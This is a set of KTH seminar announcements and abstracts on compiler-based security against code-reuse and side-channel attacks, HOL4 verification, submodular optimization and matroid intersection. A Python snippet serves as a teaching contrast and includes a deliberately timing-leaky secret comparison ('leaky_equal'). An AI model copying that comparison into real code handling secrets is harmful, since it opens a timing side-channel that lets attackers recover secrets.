Increased digitalization of services and the popularity of the Internet of Things (IoT) place increasing demands on system cybersecurity. The vulnerabilities that enable malicious actors to perform cyberattacks are often present in the binary code that runs on the target device. Such attacks include code-reuse attacks and side-channel attacks. The former reuse binary code snippets to stitch together a payload that performs a malicious action. The latter use so-called side channels, such as execution time or power consumption, to infer secret information. These attacks depend largely on the low-level code that the machine executes, and this code typically depends on compilers. Compilers perform semantics-preserving transformations that aim at improving the performance, reducing the size, or minimizing the energy consumption of the generated code. However, general-purpose compiler transformations often do not preserve security properties, while state-of-the-art approaches to secure compilation do not achieve highly optimized code. We propose a method that allows the compiler to preserve security properties and, at the same time, generate highly optimized code.
In this talk, I will present my work on securing optimized code and on verifying WebAssembly code. In particular, I will talk about 1) execution-time-aware software diversification against large-scale code-reuse attacks, 2) optimizing code against power side channels, 3) combining efficiency-aware compiler-based security mitigations, and 4) verifying constant-time programs in WebAssembly. The first work presents a code-diversification approach that operates at the machine-level intermediate representation, using a combinatorial compiler backend to achieve fine-grained diversification at the function level while controlling the execution-time overhead of the generated code. The second work describes an approach to optimizing (for performance) software-masked code while preserving the security properties that hinder power side channels. The third work presents an approach to software diversification that generates secure and optimized code against both code-reuse attacks and side-channel attacks. Finally, the last work is an approach to verifying the constant-time property, which mitigates timing side-channel attacks, at the WebAssembly level using relational symbolic execution. WebAssembly is a recent low-level language for the Web and is the target of many security-critical and performance-demanding Web applications.
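To illustrate the constant-time property checked in the last work, control flow and memory accesses must not depend on secrets. A toy comparison in Python (illustrative; the verified programs are WebAssembly) shows a leaky variant and a constant-time one:

    import hmac

    def leaky_equal(secret: bytes, guess: bytes) -> bool:
        if len(secret) != len(guess):
            return False
        for s, g in zip(secret, guess):
            if s != g:           # early exit: running time reveals the
                return False     # length of the matching prefix
        return True

    def constant_time_equal(secret: bytes, guess: bytes) -> bool:
        # Standard-library constant-time comparison.
        return hmac.compare_digest(secret, guess)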
The material for these works, including the relevant publications (one publication that is under submission is not available on the website), is available at: https://romits800.github.io/publications.html.
Didrik Lundberg (KTH) | 10:00 in Room 4523 and https://kth-se.zoom.us/j/63683731064
The broad topic of my research is creating the infrastructure for formal verification of low-level system software, device drivers, and programmable network elements with provable security guarantees, using an interactive theorem prover (ITP). Specifically, this is in the context of network and communications solutions. Part of this challenge is to incorporate precise models of various types of architectures and external or auxiliary components, and to make them available for use in an interactive theorem prover together with different pieces of code. This is not merely a practical issue, but rather a question of how to formalize into theorems just how various components are interdependent in an unstructured setting, and how to formulate modular abstractions that make it easy to add and remove external components. In particular, for programmable network elements, the data plane and the control plane, together with other external functionality, should be made modularly composable.
Concretely, this is realized by implementing, in the ITP HOL4, unstructured program logics, a formalization of the P4 language (with associated tools), and extensions of the HolBA toolbox, most importantly towards weak memory models for the multicore setting.
Guangyi Zhang | 13:30 in F3, Lindstedtsvägen 26 and https://kth-se.zoom.us/j/69024442639
Submodular functions characterize mathematically the ubiquitous "diminishing returns" property. They are widely used to describe core subjects in numerous applications, including economic utility, redundancy in information, spread of influence in social networks, and more. Optimization of submodular functions thus plays a central role in a broad range of applications in data science. However, existing works concentrate largely on optimizing a single submodular function, with a sole focus on succinct subset selection among massive data. Other circumstances have not been fully explored, for example, when there exists interplay between a submodular function and other components.
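For reference, diminishing returns has a one-line formal statement (the standard definition): a set function f on ground set V is submodular iff

    \[
      f(A \cup \{x\}) - f(A) \;\ge\; f(B \cup \{x\}) - f(B)
      \qquad \text{for all } A \subseteq B \subseteq V,\; x \in V \setminus B.
    \]

That is, adding an element to a smaller set helps at least as much as adding it to a larger one.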
In this thesis, we study optimization beyond a single (non-decreasing) submodular function in the following three areas.
Ranking: Ranking arises naturally in the presence of multiple submodular functions, for instance, when a list of shared resources is sequentially served to satisfy multiple submodular demands with individual budgets. One concrete example is ranking web pages to satisfy multiple user intents with different "patience". We first study this ranking problem under cardinality constraints, and then we consider extensions of the basic setting, including knapsack constraints, streaming settings, and robustness requirements.
Decision trees: A tree (or a policy) can be seen as an adaptive generalization of ranking. Popular decision trees for classification, including CART and C4.5, are constructed by recursive greedy splits, guided by some impurity function. These trees are accurate, but may not be easy to understand due to a potentially large tree size. A novel characterization of a decision tree is via adaptive intersection among multiple submodular functions, one for each object to be classified. We discover that this characterization enables one to analyze and control the tree complexity for a large family of impurity functions. As a consequence, we are able to produce accurate and interpretable decision trees with bounded complexity.
Diversity: Multi-objective optimization is frequently encountered in reality. One specific important form is a joint optimization of utility and diversity, where utility is often modeled by a submodular function. From the theoretical side, we discuss new techniques for such joint optimization over clustered input; from the practical side, we propose one novel application in learning diverse rule sets, where diversity encourages non-overlapping rules that deliver desirable unambiguous decisions.
For each of the three areas discussed above, we introduce novel formulations for applications in data science, and devise algorithms that are efficient, easy to implement, and have provable approximation guarantees. In addition to theory, we also highlight their practical potential by presenting empirical performance in selected applications. Our work significantly enhances the modeling capabilities of submodular optimization for novel application domains.
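As a reference point for the guarantees mentioned above, the classic greedy algorithm for maximizing a non-decreasing submodular function under a cardinality constraint achieves a (1 - 1/e)-approximation (Nemhauser, Wolsey, and Fisher, 1978); a minimal sketch, not one of the thesis algorithms:

    def greedy(f, ground_set, k):
        S = set()
        for _ in range(k):
            # Pick the element with the largest marginal gain f(S+x) - f(S).
            best = max((x for x in ground_set - S),
                       key=lambda x: f(S | {x}) - f(S),
                       default=None)
            if best is None:
                break
            S.add(best)
        return S

    # Example: coverage functions are submodular.
    sets = {"a": {1, 2}, "b": {2, 3}, "c": {4}}
    cover = lambda S: len(set().union(*(sets[x] for x in S))) if S else 0
    print(greedy(cover, set(sets), 2))  # covers 3 elements; ties broken arbitrarily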
More info can be found in Diva: http://urn.kb.se/resolve?urn=urn:nbn:se:kth:diva-322458
Joakim Blikstad | 15:00 in Room 4523 and https://kth-se.zoom.us/my/blikstad
Joakim Blikstad will present recent developments in matroid intersection algorithms. Matroid intersection is a fundamental combinatorial optimization problem that can model a range of problems, e.g., bipartite matching or packing spanning trees/arborescences.
We obtain faster matroid intersection algorithms by studying a specific graph reachability problem, for which we show new and simple algorithms. The exact complexity of this reachability problem, however, remains open. Combining our graph reachability algorithms with recent approximation algorithms, we manage to obtain the first subquadratic matroid intersection algorithms, thus breaking the "quadratic barrier".
No background about matroid intersection is needed for the talk.
The talk is mostly based on the STOC'21 paper "Breaking the Quadratic Barrier for Matroid Intersection" (https://arxiv.org/abs/2102.05548; joint work with Jan van den Brand, Sagnik Mukhopadhyay, and Danupon Nanongkai), but also on the ICALP'21 paper "Breaking O(nr) for matroid intersection", the ICALP'22 paper "Sublinear-round parallel matroid intersection", and a recent paper "Fast Algorithms via Dynamic-Oracle Matroids", still in submission.